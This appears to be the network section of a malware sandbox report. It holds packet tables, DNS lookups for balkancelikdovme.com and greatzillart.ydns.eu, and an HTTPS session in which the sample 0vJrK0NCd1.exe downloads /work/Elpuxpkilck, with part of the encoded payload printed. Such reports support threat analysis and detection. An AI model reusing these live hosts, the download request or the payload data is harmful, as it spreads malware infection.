                                                                                          Aug 23, 2023 19:31:32.310442924 CEST49737443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:31:32.313669920 CEST44349737185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:31:32.313707113 CEST44349737185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:31:32.313951015 CEST44349737185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:31:32.313968897 CEST44349737185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:31:32.314030886 CEST49737443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:31:32.314059019 CEST44349737185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:31:32.315009117 CEST49737443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:31:32.316003084 CEST49737443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:31:32.316067934 CEST44349737185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:31:32.316095114 CEST44349737185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:31:32.316298962 CEST44349737185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:31:32.316344023 CEST44349737185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:31:32.316567898 CEST44349737185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:31:32.316593885 CEST44349737185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:31:32.316831112 CEST44349737185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:31:32.316857100 CEST44349737185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:31:32.317004919 CEST49737443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:31:32.317023039 CEST44349737185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:31:32.317852020 CEST44349737185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:31:32.318022966 CEST49737443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:31:32.318118095 CEST44349737185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:31:32.319031954 CEST49737443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:31:32.319149971 CEST44349737185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:31:32.320007086 CEST49737443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:31:32.321011066 CEST49737443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:31:32.321032047 CEST44349737185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:31:32.322017908 CEST49737443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:31:32.322041988 CEST44349737185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:31:32.323028088 CEST49737443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:31:32.323045969 CEST44349737185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:31:32.323182106 CEST49737443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:31:32.323189974 CEST44349737185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:31:32.323220968 CEST49737443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:31:32.323259115 CEST49737443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:31:32.323262930 CEST44349737185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:31:32.323296070 CEST49737443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:31:32.323324919 CEST49737443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:31:32.323357105 CEST49737443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:31:32.323386908 CEST49737443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:31:32.323421955 CEST49737443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:31:32.325800896 CEST49737443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:31:32.356384039 CEST44349737185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:31:32.356427908 CEST44349737185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:31:32.356534958 CEST44349737185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:31:32.356563091 CEST44349737185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:31:32.356647015 CEST44349737185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:31:32.356671095 CEST44349737185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:31:32.356745958 CEST44349737185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:31:32.356772900 CEST44349737185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:31:32.356848001 CEST44349737185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:31:32.356894016 CEST44349737185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:31:32.357203960 CEST49737443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:31:32.358036041 CEST49737443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:31:32.358059883 CEST44349737185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:31:32.358155012 CEST49737443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:31:32.358302116 CEST49737443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:31:32.358309984 CEST44349737185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:31:32.358349085 CEST49737443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:31:32.358355045 CEST44349737185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:31:32.358407021 CEST49737443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:31:32.358413935 CEST44349737185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:31:32.358464956 CEST49737443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:31:32.358470917 CEST44349737185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:31:32.358511925 CEST49737443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:31:32.358517885 CEST44349737185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:31:32.358561993 CEST49737443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:31:32.358566046 CEST44349737185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:31:32.358606100 CEST49737443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:31:32.358632088 CEST44349737185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:31:32.358650923 CEST49737443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:31:32.358656883 CEST44349737185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:31:32.358690023 CEST49737443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:31:32.358695984 CEST44349737185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:31:32.358732939 CEST49737443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:31:32.358737946 CEST44349737185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:31:32.358767033 CEST49737443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:31:32.358772039 CEST44349737185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:31:32.358781099 CEST44349737185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:31:32.358814001 CEST49737443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:31:32.358819008 CEST44349737185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:31:32.358841896 CEST49737443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:31:32.358848095 CEST44349737185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:31:32.358880997 CEST49737443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:31:32.358886003 CEST44349737185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:31:32.358925104 CEST49737443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:31:32.358930111 CEST44349737185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:31:32.358939886 CEST44349737185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:31:32.358978987 CEST49737443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:31:32.358984947 CEST44349737185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:31:32.359018087 CEST49737443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:31:32.359023094 CEST44349737185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:31:32.359075069 CEST49737443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:31:32.359126091 CEST49737443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:31:32.359131098 CEST44349737185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:31:32.359148026 CEST44349737185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:31:32.359167099 CEST49737443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:31:32.359203100 CEST49737443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:31:32.359245062 CEST49737443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:31:32.359278917 CEST49737443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:31:32.359317064 CEST49737443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:31:32.359352112 CEST49737443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:31:32.359390020 CEST49737443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:31:32.420594931 CEST49737443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:31:32.420939922 CEST49737443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:31:32.457674026 CEST49737443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:31:32.457736015 CEST44349737185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:31:32.457765102 CEST49737443192.168.2.3185.181.116.217
                                                                                          Aug 23, 2023 19:31:32.457773924 CEST44349737185.181.116.217192.168.2.3
                                                                                          Aug 23, 2023 19:31:52.241105080 CEST497291984192.168.2.3185.216.71.113
                                                                                          Aug 23, 2023 19:31:53.405697107 CEST497461984192.168.2.3185.216.71.113
                                                                                          Aug 23, 2023 19:31:53.432353020 CEST198449746185.216.71.113192.168.2.3
                                                                                          Aug 23, 2023 19:31:53.432568073 CEST497461984192.168.2.3185.216.71.113
                                                                                          Aug 23, 2023 19:31:53.439621925 CEST497461984192.168.2.3185.216.71.113
                                                                                          Aug 23, 2023 19:31:53.577601910 CEST198449746185.216.71.113192.168.2.3
                                                                                          Aug 23, 2023 19:32:04.010745049 CEST198449746185.216.71.113192.168.2.3
                                                                                          Aug 23, 2023 19:32:04.054502964 CEST497461984192.168.2.3185.216.71.113
                                                                                          Aug 23, 2023 19:32:04.082494974 CEST198449746185.216.71.113192.168.2.3
                                                                                          Aug 23, 2023 19:32:04.094211102 CEST497461984192.168.2.3185.216.71.113
                                                                                          Aug 23, 2023 19:32:04.171715975 CEST198449746185.216.71.113192.168.2.3
                                                                                          Aug 23, 2023 19:32:04.172044992 CEST497461984192.168.2.3185.216.71.113
                                                                                          Aug 23, 2023 19:32:04.285057068 CEST198449746185.216.71.113192.168.2.3

                                                                                          UDP Packets

                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                          Aug 23, 2023 19:30:31.757884979 CEST5173953192.168.2.38.8.8.8
                                                                                          Aug 23, 2023 19:30:31.806010962 CEST53517398.8.8.8192.168.2.3
                                                                                          Aug 23, 2023 19:30:47.700331926 CEST6360453192.168.2.38.8.8.8
                                                                                          Aug 23, 2023 19:30:47.738593102 CEST53636048.8.8.8192.168.2.3
                                                                                          Aug 23, 2023 19:31:17.156790972 CEST6163653192.168.2.38.8.8.8
                                                                                          Aug 23, 2023 19:31:17.216872931 CEST53616368.8.8.8192.168.2.3
                                                                                          Aug 23, 2023 19:31:31.365551949 CEST5969753192.168.2.38.8.8.8
                                                                                          Aug 23, 2023 19:31:31.421535015 CEST53596978.8.8.8192.168.2.3
                                                                                          Aug 23, 2023 19:31:53.274295092 CEST5330453192.168.2.38.8.8.8
                                                                                          Aug 23, 2023 19:31:53.344924927 CEST53533048.8.8.8192.168.2.3

                                                                                          DNS Queries

                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                          Aug 23, 2023 19:30:31.757884979 CEST192.168.2.38.8.8.80x4380Standard query (0)balkancelikdovme.comA (IP address)IN (0x0001)false
                                                                                          Aug 23, 2023 19:30:47.700331926 CEST192.168.2.38.8.8.80xdffdStandard query (0)greatzillart.ydns.euA (IP address)IN (0x0001)false
                                                                                          Aug 23, 2023 19:31:17.156790972 CEST192.168.2.38.8.8.80xe46fStandard query (0)balkancelikdovme.comA (IP address)IN (0x0001)false
                                                                                          Aug 23, 2023 19:31:31.365551949 CEST192.168.2.38.8.8.80x2211Standard query (0)balkancelikdovme.comA (IP address)IN (0x0001)false
                                                                                          Aug 23, 2023 19:31:53.274295092 CEST192.168.2.38.8.8.80x14e2Standard query (0)greatzillart.ydns.euA (IP address)IN (0x0001)false

                                                                                          DNS Answers

                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                          Aug 23, 2023 19:30:31.806010962 CEST8.8.8.8192.168.2.30x4380No error (0)balkancelikdovme.com185.181.116.217A (IP address)IN (0x0001)false
                                                                                          Aug 23, 2023 19:30:47.738593102 CEST8.8.8.8192.168.2.30xdffdNo error (0)greatzillart.ydns.eu185.216.71.113A (IP address)IN (0x0001)false
                                                                                          Aug 23, 2023 19:31:17.216872931 CEST8.8.8.8192.168.2.30xe46fNo error (0)balkancelikdovme.com185.181.116.217A (IP address)IN (0x0001)false
                                                                                          Aug 23, 2023 19:31:31.421535015 CEST8.8.8.8192.168.2.30x2211No error (0)balkancelikdovme.com185.181.116.217A (IP address)IN (0x0001)false
                                                                                          Aug 23, 2023 19:31:53.344924927 CEST8.8.8.8192.168.2.30x14e2No error (0)greatzillart.ydns.eu185.216.71.113A (IP address)IN (0x0001)false

                                                                                          HTTP Request Dependency Graph

                                                                                          • balkancelikdovme.com

                                                                                          HTTPS Proxied Packets

                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          0192.168.2.349727185.181.116.217443C:\Users\user\Desktop\0vJrK0NCd1.exe
                                                                                          TimestampkBytes transferredDirectionData
                                                                                          2023-08-23 17:30:33 UTC0OUTGET /work/Elpuxpkilck HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Accept: */*
                                                                                          User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                          Host: balkancelikdovme.com
                                                                                          2023-08-23 17:30:33 UTC0INHTTP/1.1 200 OK
                                                                                          Connection: close
                                                                                          last-modified: Tue, 22 Aug 2023 08:42:22 GMT
                                                                                          accept-ranges: bytes
                                                                                          content-length: 1036168
                                                                                          date: Wed, 23 Aug 2023 17:30:33 GMT
                                                                                          vary: User-Agent
                                                                                          alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                          2023-08-23 17:30:33 UTC0INData Raw: 53 30 6c 4b 52 6d 46 57 48 42 64 43 59 55 52 6f 49 69 49 58 59 55 52 46 52 69 46 48 53 30 6c 4b 49 69 4a 45 59 55 56 45 56 6c 68 46 52 45 4a 68 4c 43 67 6b 4a 44 45 39 4f 43 77 7a 4e 44 6b 6d 4f 79 6f 32 4a 44 4d 36 4a 7a 45 6c 50 44 73 76 4c 54 67 36 4f 53 6b 6b 4f 44 67 32 4a 43 34 77 4a 44 49 6f 4b 7a 4d 79 4b 79 77 6c 4c 44 59 6e 4f 44 6b 30 4e 69 30 72 4a 53 51 73 4a 6a 30 33 50 54 59 78 4e 79 67 6f 4f 7a 63 32 4e 43 30 6e 50 53 77 34 4c 54 63 73 4d 30 74 4a 53 6b 5a 68 56 68 77 58 51 6d 46 45 61 43 49 69 46 32 46 45 52 55 59 68 52 30 74 4a 53 69 49 69 52 47 46 46 52 46 5a 59 52 55 52 43 59 57 59 76 4d 7a 67 37 4d 79 34 73 4c 79 59 75 53 30 6c 4b 52 6d 46 57 48 42 64 43 59 55 52 6f 49 69 49 58 59 55 52 46 52 69 46 48 53 30 6c 4b 49 69 4a 45 59 55 56
                                                                                          Data Ascii: S0lKRmFWHBdCYURoIiIXYURFRiFHS0lKIiJEYUVEVlhFREJhLCgkJDE9OCwzNDkmOyo2JDM6JzElPDsvLTg6OSkkODg2JC4wJDIoKzMyKywlLDYnODk0Ni0rJSQsJj03PTYxNygoOzc2NC0nPSw4LTcsM0tJSkZhVhwXQmFEaCIiF2FERUYhR0tJSiIiRGFFRFZYRURCYWYvMzg7My4sLyYuS0lKRmFWHBdCYURoIiIXYURFRiFHS0lKIiJEYUV
                                                                                          2023-08-23 17:30:33 UTC1INData Raw: 78 6c 4e 58 6a 6c 77 34 2b 68 4b 39 38 39 72 64 79 50 64 68 47 78 44 4e 75 57 53 7a 59 68 73 56 31 30 52 51 4c 68 72 42 75 42 5a 65 57 31 6e 49 4d 6d 4e 6a 75 2b 79 47 51 59 56 44 2f 51 30 4e 66 71 31 46 77 52 31 7a 45 4a 42 6a 74 78 56 69 53 48 55 69 32 51 46 79 62 47 41 62 7a 33 34 57 74 53 46 4c 41 33 38 55 57 53 35 61 77 6b 35 4b 4c 2f 70 2b 62 35 47 30 7a 68 73 55 75 74 65 4b 65 6b 32 7a 2f 56 50 71 79 62 39 63 4b 78 59 65 2f 39 55 63 38 43 4a 46 4b 46 37 49 54 59 66 45 50 75 4b 31 75 31 4a 52 50 2f 74 69 58 57 42 49 4c 6c 6f 55 52 49 41 47 77 58 55 4c 76 41 53 7a 64 57 72 76 78 6c 4b 34 2f 62 72 36 74 77 4e 32 46 45 73 57 53 77 6a 50 62 73 6f 70 2b 32 58 51 61 30 73 38 41 32 4e 44 55 38 6b 72 46 6d 76 44 78 59 42 31 53 50 72 2b 51 72 77 44 7a 65 76
                                                                                          Data Ascii: xlNXjlw4+hK989rdyPdhGxDNuWSzYhsV10RQLhrBuBZeW1nIMmNju+yGQYVD/Q0Nfq1FwR1zEJBjtxViSHUi2QFybGAbz34WtSFLA38UWS5awk5KL/p+b5G0zhsUuteKek2z/VPqyb9cKxYe/9Uc8CJFKF7ITYfEPuK1u1JRP/tiXWBILloURIAGwXULvASzdWrvxlK4/br6twN2FEsWSwjPbsop+2XQa0s8A2NDU8krFmvDxYB1SPr+QrwDzev
                                                                                          2023-08-23 17:30:33 UTC16INData Raw: 5a 6b 4b 6e 41 32 45 48 45 4d 51 50 55 39 44 55 42 5a 50 6c 6b 2b 46 54 6b 57 4a 79 51 6b 63 54 30 37 4e 6a 41 30 4d 79 6c 66 4a 45 67 70 54 44 71 79 4b 72 38 6c 74 44 72 47 50 64 38 38 32 7a 33 6b 50 64 73 31 67 6b 42 35 4b 58 30 6d 69 43 69 6b 4c 71 4d 6a 72 43 61 6b 4f 70 59 30 71 43 34 59 50 47 77 6e 39 6a 67 50 4b 51 59 6a 2b 54 74 65 4e 56 73 35 55 79 5a 71 50 6d 4d 30 50 43 4e 42 4b 53 77 6c 4f 6a 78 57 4e 45 51 39 54 79 79 34 4c 4c 59 39 78 7a 54 41 4c 39 4d 71 33 45 48 57 4d 64 55 6b 6b 43 4f 43 4a 33 30 30 66 54 69 77 4d 5a 4a 41 61 79 67 43 4f 67 6b 32 4d 7a 68 61 4a 62 4d 2b 75 69 2f 68 50 4e 73 6a 65 43 61 4c 4e 35 49 6a 6d 7a 65 68 4f 78 59 39 42 45 44 2b 50 51 42 78 7a 30 46 52 4e 6c 34 78 78 79 37 6b 4d 2b 41 38 65 7a 36 66 4c 36 59 75 44
                                                                                          Data Ascii: ZkKnA2EHEMQPU9DUBZPlk+FTkWJyQkcT07NjA0MylfJEgpTDqyKr8ltDrGPd882z3kPds1gkB5KX0miCikLqMjrCakOpY0qC4YPGwn9jgPKQYj+TteNVs5UyZqPmM0PCNBKSwlOjxWNEQ9Tyy4LLY9xzTAL9Mq3EHWMdUkkCOCJ300fTiwMZJAaygCOgk2MzhaJbM+ui/hPNsjeCaLN5IjmzehOxY9BED+PQBxz0FRNl4xxy7kM+A8ez6fL6YuD
                                                                                          2023-08-23 17:30:33 UTC32INData Raw: 62 47 75 73 6d 38 78 72 2f 47 7a 63 37 4f 78 62 61 36 78 72 2f 42 76 64 47 33 79 38 44 50 76 37 76 4c 78 4e 47 35 74 38 4c 4a 76 62 79 38 7a 64 47 36 75 38 44 52 79 4d 50 4f 77 38 72 48 76 38 50 48 78 74 48 4a 77 4d 75 36 75 72 37 41 79 63 6a 52 7a 73 62 50 75 62 71 35 76 38 57 36 79 73 32 33 75 73 44 42 79 63 71 35 79 62 72 43 75 38 6d 2f 52 4d 72 52 77 6d 6d 30 76 54 36 6f 54 37 6f 7a 6f 6b 69 2f 7a 53 71 39 7a 4d 56 4d 74 72 6a 44 54 72 71 37 76 44 4c 4f 76 62 63 6b 79 4d 64 45 61 73 76 4e 51 78 7a 4e 79 4d 5a 50 78 72 38 69 68 2b 48 42 77 4b 54 49 30 63 37 47 30 4c 6d 37 75 63 44 46 75 38 72 4b 74 37 76 41 76 73 6e 4c 75 63 61 36 79 62 76 47 76 38 62 4b 7a 73 37 46 75 62 72 4a 76 35 75 36 7a 33 43 4d 76 39 47 2b 76 63 72 43 30 62 61 33 78 4d 6d 36 76
                                                                                          Data Ascii: bGusm8xr/Gzc7Oxba6xr/BvdG3y8DPv7vLxNG5t8LJvby8zdG6u8DRyMPOw8rHv8PHxtHJwMu6ur7AycjRzsbPubq5v8W6ys23usDBycq5ybrCu8m/RMrRwmm0vT6oT7ozoki/zSq9zMVMtrjDTrq7vDLOvbckyMdEasvNQxzNyMZPxr8ih+HBwKTI0c7G0Lm7ucDFu8rKt7vAvsnLuca6ybvGv8bKzs7FubrJv5u6z3CMv9G+vcrC0ba3xMm6v
                                                                                          2023-08-23 17:30:33 UTC48INData Raw: 37 45 30 59 65 2f 78 4d 53 47 30 63 61 37 69 37 71 39 76 59 44 4a 78 38 71 4f 78 74 43 79 65 37 6e 41 78 6e 76 4b 79 73 44 62 77 4c 34 58 7a 62 6e 47 74 65 6d 37 78 72 6a 6d 79 73 35 67 76 62 6d 36 79 63 43 2b 76 64 43 33 7a 4d 44 4f 76 37 7a 4c 78 64 47 32 74 38 50 4a 75 72 79 39 7a 63 36 36 75 73 44 4f 79 4d 4c 4f 78 4d 72 48 76 38 54 48 78 74 48 47 77 4d 75 36 76 62 37 41 79 63 66 52 7a 73 62 51 75 62 75 35 77 4d 57 37 79 73 71 33 75 38 43 2b 79 63 75 35 78 72 72 4a 75 38 61 2f 78 73 70 6e 7a 70 79 32 76 63 61 6d 77 62 72 51 72 73 75 2f 7a 71 61 37 7a 4d 57 59 75 62 6a 44 6f 4c 32 37 76 5a 54 52 76 62 71 70 30 63 66 43 6c 38 50 4e 78 36 62 44 79 4d 61 59 79 52 66 4c 6f 37 71 2b 77 4d 6e 48 30 63 37 47 30 4c 6d 37 75 63 44 46 75 38 72 4b 75 4c 74 73 31
                                                                                          Data Ascii: 7E0Ye/xMSG0ca7i7q9vYDJx8qOxtCye7nAxnvKysDbwL4XzbnGtem7xrjmys5gvbm6ycC+vdC3zMDOv7zLxdG2t8PJury9zc66usDOyMLOxMrHv8THxtHGwMu6vb7AycfRzsbQubu5wMW7ysq3u8C+ycu5xrrJu8a/xspnzpy2vcamwbrQrsu/zqa7zMWYubjDoL27vZTRvbqp0cfCl8PNx6bDyMaYyRfLo7q+wMnH0c7G0Lm7ucDFu8rKuLts1
                                                                                          2023-08-23 17:30:33 UTC64INData Raw: 62 4b 7a 73 37 46 75 62 72 47 76 37 36 39 30 4c 66 4d 77 4d 36 2f 76 4d 76 46 30 62 61 33 77 38 6d 36 76 4c 33 4e 7a 72 71 36 77 4d 37 49 77 73 37 45 79 73 65 2f 78 4d 66 47 30 63 62 41 79 37 71 39 76 73 44 4a 78 39 48 4f 78 74 43 35 75 37 6e 41 78 62 76 4b 79 72 65 37 77 4c 37 4a 79 37 6e 47 75 73 6d 37 78 72 2f 47 79 73 37 4f 78 62 6d 36 78 72 2b 2b 76 64 43 33 7a 4d 44 4f 76 37 7a 4c 78 64 47 32 74 38 50 4a 75 72 79 39 7a 63 36 36 75 73 44 4f 79 4d 4c 4f 78 4d 72 48 76 38 54 48 78 74 48 47 77 4d 75 36 76 62 37 41 79 63 66 52 7a 73 62 51 75 62 75 35 77 4d 57 37 79 73 71 33 75 38 43 2b 79 63 75 35 78 72 72 4a 75 38 61 2f 78 73 72 4f 7a 73 57 35 75 73 61 2f 76 72 33 51 74 38 7a 41 7a 72 2b 38 79 38 58 52 74 72 66 44 79 62 71 38 76 63 33 4f 75 72 72 41 7a
                                                                                          Data Ascii: bKzs7FubrGv7690LfMwM6/vMvF0ba3w8m6vL3Nzrq6wM7Iws7Eyse/xMfG0cbAy7q9vsDJx9HOxtC5u7nAxbvKyre7wL7Jy7nGusm7xr/Gys7Oxbm6xr++vdC3zMDOv7zLxdG2t8PJury9zc66usDOyMLOxMrHv8THxtHGwMu6vb7AycfRzsbQubu5wMW7ysq3u8C+ycu5xrrJu8a/xsrOzsW5usa/vr3Qt8zAzr+8y8XRtrfDybq8vc3OurrAz
                                                                                          2023-08-23 17:30:33 UTC80INData Raw: 62 52 78 73 44 4c 75 72 32 2b 77 4d 6e 48 30 63 37 47 30 4c 6d 37 75 63 44 46 75 38 72 4b 74 37 76 41 76 73 6e 4c 75 63 61 36 79 62 76 47 76 38 62 4b 7a 73 37 46 75 62 72 47 76 37 36 39 30 4c 66 4d 77 4d 36 2f 76 4d 76 46 30 62 61 33 77 38 6d 36 76 4c 33 4e 7a 72 71 36 77 4d 37 49 77 73 37 45 79 73 65 2f 78 4d 66 47 30 63 62 41 79 37 71 39 76 73 44 4a 78 39 48 4f 78 74 43 35 75 37 6e 41 78 62 76 4b 79 72 65 37 77 4c 37 4a 79 37 6e 47 75 73 6d 37 78 72 2f 47 79 73 37 4f 78 62 6d 36 78 72 2b 2b 76 64 43 33 7a 4d 44 4f 76 37 7a 4c 78 64 47 32 74 38 50 4a 75 72 79 39 7a 63 36 36 75 73 44 4f 79 4d 4c 4f 78 4d 72 48 76 38 54 48 78 74 48 47 77 4d 75 36 76 62 37 41 79 63 66 52 7a 73 62 51 75 62 75 35 77 4d 57 37 79 73 71 33 75 38 43 2b 79 63 75 35 78 72 72 4a 75
                                                                                          Data Ascii: bRxsDLur2+wMnH0c7G0Lm7ucDFu8rKt7vAvsnLuca6ybvGv8bKzs7FubrGv7690LfMwM6/vMvF0ba3w8m6vL3Nzrq6wM7Iws7Eyse/xMfG0cbAy7q9vsDJx9HOxtC5u7nAxbvKyre7wL7Jy7nGusm7xr/Gys7Oxbm6xr++vdC3zMDOv7zLxdG2t8PJury9zc66usDOyMLOxMrHv8THxtHGwMu6vb7AycfRzsbQubu5wMW7ysq3u8C+ycu5xrrJu
                                                                                          2023-08-23 17:30:33 UTC96INData Raw: 45 4b 43 41 6a 39 2b 50 34 4a 45 55 6a 41 34 4d 55 4d 2b 52 45 48 2f 77 46 4d 2f 76 50 32 41 76 51 4c 2b 47 49 47 5a 63 66 4b 78 2f 5a 6e 41 76 4c 33 2f 51 73 65 42 41 67 47 2f 2f 74 53 43 67 35 69 44 51 73 52 55 4c 79 2f 75 38 6f 50 2b 41 58 33 47 77 54 31 39 51 42 51 78 56 76 47 41 76 76 2f 4a 46 70 6f 48 52 4e 71 47 45 57 39 30 42 48 35 41 6d 6f 4b 44 76 56 56 44 42 44 34 43 50 2f 2f 2b 78 62 4e 73 62 6f 45 42 66 73 48 2b 47 6a 36 44 67 63 43 5a 51 49 41 44 67 55 47 44 76 30 57 76 67 54 4a 58 67 37 34 42 78 2f 30 42 66 62 37 2b 2f 34 4e 59 62 65 70 77 4c 35 67 39 76 4a 66 2f 66 2f 36 47 66 6f 41 44 51 33 34 43 50 59 54 78 71 61 2b 43 50 55 43 4b 76 77 49 41 76 33 35 2b 50 6d 32 74 77 49 50 2f 2f 38 50 45 46 6e 2b 39 41 55 50 2b 76 64 6e 78 67 54 48 76
                                                                                          Data Ascii: EKCAj9+P4JEUjA4MUM+REH/wFM/vP2AvQL+GIGZcfKx/ZnAvL3/QseBAgG//tSCg5iDQsRULy/u8oP+AX3GwT19QBQxVvGAvv/JFpoHRNqGEW90BH5AmoKDvVVDBD4CP//+xbNsboEBfsH+Gj6DgcCZQIADgUGDv0WvgTJXg74Bx/0Bfb7+/4NYbepwL5g9vJf/f/6GfoADQ34CPYTxqa+CPUCKvwIAv35+Pm2twIP//8PEFn+9AUP+vdnxgTHv
